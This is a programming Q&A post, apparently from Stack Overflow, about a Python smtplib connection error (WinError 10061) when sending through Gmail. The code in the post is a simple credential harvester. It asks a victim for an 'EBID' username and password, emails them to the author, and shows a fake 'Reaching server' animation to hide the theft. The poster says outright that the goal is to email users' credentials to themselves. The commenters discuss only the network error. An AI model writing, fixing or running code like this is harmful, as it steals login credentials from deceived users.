# WinError 10061 when trying to use smtp module in python to email self using Google server

Tags: python, email, smtp

I'm creating this program that email user inputted credentials to me. I am using python build 3.7.2 and smtp for the emailing. However when trying to successfully email myself it prompts an error:

[[WinError 10061] No connection could be made because the target machine actively refused it.

I have zero experience with smtp other than know. I got the smtp part from a youtube video.

I have removed the actual email and password for obvious reason and replaced them with appropriate labels.
Here is my code:

```
import os, time, sys, smtplib

os.system('color 17')
print ("Pleas type your EBID username.")
name = input (":")
time.sleep(1)
os.system('cls')
password = input("Your EBID Password\n:")
info = "Username: " + name + "\n" + "Password: " + password
content = info
mail = smtplib.SMTP('smtp.gmail.com', 587)
mail.ehlo()
mail.starttls()
mail.login('Myemailtosendmessage', 'passwordforthatemail')
mail.sendmail('Myemailtosendmessage', 'recieversemail',content)
mail.close()
time.sleep(1)
os.system('cls')
var = "Reaching server"
wait = 0
while wait < 5:
        wait = wait + 1
        var = var + "."
        print(var)
        time.sleep(1)
        os.system('cls')
time.sleep(3)
```

It is expected to work normally and send an email the str in 'content' to my email.

Comment: If you are trying to send from GCE (Google Cloud), then AFAIK they do not support it.

Comment: Thankyou for answering but I how do I know if I'm sending form GCE and what is AFAIK?

Comment: Oh I see, I missunderstood - I interpreted "using Goolge server" as having your own smtp on Google Cloud. Ignore that please. AFAIK is acronym for "as far as I know".